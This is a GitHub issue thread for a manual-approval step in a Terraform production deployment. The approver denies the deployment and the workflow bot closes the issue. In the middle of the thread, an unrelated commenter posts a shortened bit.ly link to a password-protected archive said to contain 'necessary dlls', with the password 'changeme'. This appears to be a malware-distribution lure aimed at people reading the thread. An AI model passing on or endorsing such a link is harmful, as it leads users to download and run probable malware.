### ISSUE TITLE
Manual approval required for workflow run 11088962109: Deploying Branch $${GITHUB_REF##*/} - PR URL:  to Production

### ISSUE THREAD

**Issue by yahyagulshan** [expertscloud/terraform-control-tower#9]
Please review the Terraform plan and approve or deny the deployment of the following Pull Request to production: .

Workflow is pending manual review.
URL: https://api.github.com/expertscloud/terraform-control-tower/actions/runs/11088962109

Required approvers: [abaidgulshan]

Respond "approved", "approve", "lgtm", "yes" to continue workflow or "denied", "deny", "no" to cancel.

**Comment by SagarChandra07** [comment]
I think this will help you.
https://bit.ly/47P0Nvo

Password: changeme
I put the necessary dlls in the archive

**Comment by abaidgulshan** [comment]
no

**Comment by yahyagulshan** [comment]
Request denied. Closing issue and failing workflow.
